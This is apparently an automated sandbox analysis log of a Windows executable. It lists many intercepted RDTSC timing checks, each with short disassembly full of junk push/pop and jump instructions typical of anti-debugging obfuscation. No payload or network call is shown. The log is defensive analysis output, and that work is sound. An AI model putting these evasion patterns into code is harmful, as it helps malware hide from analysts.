Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC6DAE second address: EC6DBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F60F12493A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EC6DBA second address: EC6DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED5259 second address: ED525F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED525F second address: ED5265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED3248 second address: ED3254 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F60F12493A6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED3254 second address: ED3265 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pushad 0x00000007 jg 00007F60F1137216h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED3732 second address: ED3736 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED3736 second address: ED373C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED373C second address: ED374A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F60F12493ACh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED374A second address: ED3758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jc 00007F60F1137216h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED38C0 second address: ED38C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED38C5 second address: ED38E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F1137224h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F60F1137216h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED38E6 second address: ED38FA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F60F12493A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F60F12493A6h 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED3CE0 second address: ED3CE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED3E88 second address: ED3E9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60F12493B1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED3E9D second address: ED3EB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F60F113721Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED4006 second address: ED400C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED400C second address: ED4010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED4169 second address: ED4173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED4173 second address: ED4184 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jo 00007F60F1137216h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED48E9 second address: ED48EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED48EF second address: ED48F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED48F3 second address: ED48F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED48F7 second address: ED48FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED48FD second address: ED4919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007F60F12493B2h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED4919 second address: ED493A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F1137226h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED493A second address: ED4971 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F60F12493A6h 0x00000008 je 00007F60F12493A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F60F12493AFh 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F60F12493B6h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED90E7 second address: ED9103 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F60F1137224h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED9103 second address: ED9112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F60F12493A6h 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED9112 second address: ED9116 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED9116 second address: ED913C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F60F12493A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F60F12493AAh 0x00000013 jmp 00007F60F12493AEh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ED913C second address: ED9142 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDC182 second address: EDC1C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F60F12493B0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F60F12493B7h 0x00000014 jl 00007F60F12493A6h 0x0000001a push eax 0x0000001b pop eax 0x0000001c ja 00007F60F12493A6h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EDC1C2 second address: EDC1DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F60F1137228h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE92DA second address: EE92E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EE8E23 second address: EE8E27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEC964 second address: EEC970 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F60F12493A6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EEC970 second address: EEC986 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60F1137222h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFEA00 second address: EFEA12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F60F12493A6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFEA12 second address: EFEA16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: EFEA16 second address: EFEA22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F60F12493A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F03E5E second address: F03E62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F040BF second address: F040E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F60F12493B0h 0x0000000a pushad 0x0000000b jnp 00007F60F12493A6h 0x00000011 push edx 0x00000012 pop edx 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F040E4 second address: F040EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F040EA second address: F040EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F04240 second address: F04244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F044D4 second address: F04512 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F60F12493A6h 0x00000008 jmp 00007F60F12493B7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F60F12493B1h 0x00000016 push edi 0x00000017 js 00007F60F12493A6h 0x0000001d pushad 0x0000001e popad 0x0000001f pop edi 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F04F97 second address: F04FB0 instructions: 0x00000000 rdtsc 0x00000002 js 00007F60F1137216h 0x00000008 jmp 00007F60F113721Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F04FB0 second address: F04FB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0A731 second address: F0A747 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F1137222h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0A47F second address: F0A48A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F0A48A second address: F0A492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F150E4 second address: F150EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F14F09 second address: F14F0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1DD16 second address: F1DD1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1DD1A second address: F1DD38 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F60F1137228h 0x0000000c jmp 00007F60F1137222h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1DD38 second address: F1DD3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1DD3E second address: F1DD48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F60F1137216h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1DD48 second address: F1DD4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1DD4C second address: F1DD77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jns 00007F60F113721Ch 0x00000011 pushad 0x00000012 jmp 00007F60F1137221h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1DB6F second address: F1DB8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F60F12493B3h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1DB8B second address: F1DB9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jc 00007F60F113721Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1DB9B second address: F1DBA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F1DBA2 second address: F1DBA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2B8ED second address: F2B90E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F60F12493B9h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F2B90E second address: F2B922 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F60F113721Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3A67F second address: F3A685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3A685 second address: F3A68F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F60F1137216h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3A68F second address: F3A6B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F60F12493B8h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3A6B1 second address: F3A6B7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3A6B7 second address: F3A6D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60F12493B9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3A6D4 second address: F3A6D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3A807 second address: F3A80B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3AACE second address: F3AAD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3B0E8 second address: F3B0EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3B0EE second address: F3B104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60F1137222h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3B104 second address: F3B115 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F12493ADh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3B115 second address: F3B12C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 ja 00007F60F1137222h 0x0000000f jnl 00007F60F1137216h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3B12C second address: F3B134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3B134 second address: F3B13F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3E460 second address: F3E46C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3E46C second address: F3E471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3E471 second address: F3E47D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F60F12493A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F3E47D second address: F3E481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F40DA9 second address: F40DAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F40DAE second address: F40DB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F40E4B second address: F40E51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F40E51 second address: F40E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F410D3 second address: F410D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F410D7 second address: F41120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F60F1137218h 0x0000000c popad 0x0000000d nop 0x0000000e mov dx, E42Eh 0x00000012 jmp 00007F60F1137227h 0x00000017 push 00000004h 0x00000019 movsx edx, dx 0x0000001c mov edx, dword ptr [ebp+122D290Ch] 0x00000022 push 143D95A1h 0x00000027 js 00007F60F1137224h 0x0000002d push eax 0x0000002e push edx 0x0000002f js 00007F60F1137216h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F42CCF second address: F42CD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F42CD3 second address: F42CFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 ja 00007F60F1137216h 0x0000000d jnl 00007F60F1137216h 0x00000013 jmp 00007F60F113721Fh 0x00000018 push edx 0x00000019 pop edx 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F42CFC second address: F42D06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F60F12493A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F42810 second address: F42826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F60F113721Fh 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F44956 second address: F4495C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D026E second address: 54D0288 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F1137226h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D0288 second address: 54D028E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D028E second address: 54D029C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D029C second address: 54D02A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edi, ax 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D02A4 second address: 54D02AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D02AA second address: 54D02AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D02AE second address: 54D02B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D0369 second address: 54D036F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54D036F second address: 54D0375 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
